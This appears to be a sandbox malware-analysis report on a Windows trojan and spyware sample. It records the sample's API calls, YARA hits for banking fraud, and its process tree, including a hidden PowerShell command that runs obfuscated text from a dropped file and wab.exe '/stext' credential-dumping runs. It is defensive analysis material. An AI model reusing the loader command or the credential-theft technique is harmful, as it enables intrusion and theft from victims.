            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004068B5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Gloved172\3RBUJ4RX4a.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00401806 NtdllDefWindowProc_W,6_2_00401806
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004018C0 NtdllDefWindowProc_W,6_2_004018C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004016FD NtdllDefWindowProc_A,7_2_004016FD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004017B7 NtdllDefWindowProc_A,7_2_004017B7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00402CAC NtdllDefWindowProc_A,10_2_00402CAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00402D66 NtdllDefWindowProc_A,10_2_00402D66
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403382
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004069530_2_00406953
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0463EFF82_2_0463EFF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0463F8C82_2_0463F8C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0463ECB02_2_0463ECB0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0750C1E02_2_0750C1E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D7B5C15_2_21D7B5C1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D871FB5_2_21D871FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044B0406_2_0044B040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0043610D6_2_0043610D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004473106_2_00447310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044A4906_2_0044A490
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040755A6_2_0040755A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0043C5606_2_0043C560
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044B6106_2_0044B610
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044D6C06_2_0044D6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004476F06_2_004476F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044B8706_2_0044B870
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044081D6_2_0044081D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004149576_2_00414957
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004079EE6_2_004079EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00407AEB6_2_00407AEB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044AA806_2_0044AA80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00412AA96_2_00412AA9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00404B746_2_00404B74
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00404B036_2_00404B03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044BBD86_2_0044BBD8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00404BE56_2_00404BE5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00404C766_2_00404C76
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00415CFE6_2_00415CFE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00416D726_2_00416D72
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00446D306_2_00446D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00446D8B6_2_00446D8B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00406E8F6_2_00406E8F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004050387_2_00405038
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0041208C7_2_0041208C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004050A97_2_004050A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0040511A7_2_0040511A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0043C13A7_2_0043C13A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004051AB7_2_004051AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004493007_2_00449300
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0040D3227_2_0040D322
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0044A4F07_2_0044A4F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0043A5AB7_2_0043A5AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004136317_2_00413631
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004466907_2_00446690
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0044A7307_2_0044A730
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004398D87_2_004398D8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004498E07_2_004498E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0044A8867_2_0044A886
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0043DA097_2_0043DA09
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00438D5E7_2_00438D5E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00449ED07_2_00449ED0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0041FE837_2_0041FE83
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00430F547_2_00430F54
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004050C210_2_004050C2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004014AB10_2_004014AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040513310_2_00405133
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004051A410_2_004051A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040124610_2_00401246
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040CA4610_2_0040CA46
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040523510_2_00405235
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004032C810_2_004032C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040168910_2_00401689
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00402F6010_2_00402F60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
            Source: 3RBUJ4RX4a.exeStatic PE information: invalid certificate
            Source: 3RBUJ4RX4a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@16/21@3/3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,6_2_004182CE
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403382
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,10_2_00410DE1
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_00404769 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404769
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,6_2_00413D4C
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_00402178 CoCreateInstance,MultiByteToWideChar,0_2_00402178
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,6_2_0040B58D
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile created: C:\Users\user\AppData\Local\forfrdeligeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-KRPMMI
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile created: C:\Users\user\AppData\Local\Temp\nsc6A62.tmpJump to behavior
            Source: 3RBUJ4RX4a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wab.exe, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wab.exe, wab.exe, 00000007.00000002.2433952365.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wab.exe, 00000005.00000002.4458729154.0000000022220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wab.exe, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wab.exe, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wab.exe, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wab.exe, 00000006.00000003.2456036918.000000000302A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000003.2456957425.000000000302B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wab.exe, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 3RBUJ4RX4a.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile read: C:\Users\user\Desktop\3RBUJ4RX4a.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-33249
            Source: unknownProcess created: C:\Users\user\Desktop\3RBUJ4RX4a.exe "C:\Users\user\Desktop\3RBUJ4RX4a.exe"
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\goffgnlsvseqesrcrjy"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\goffgnlsvseqesrcrjy"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
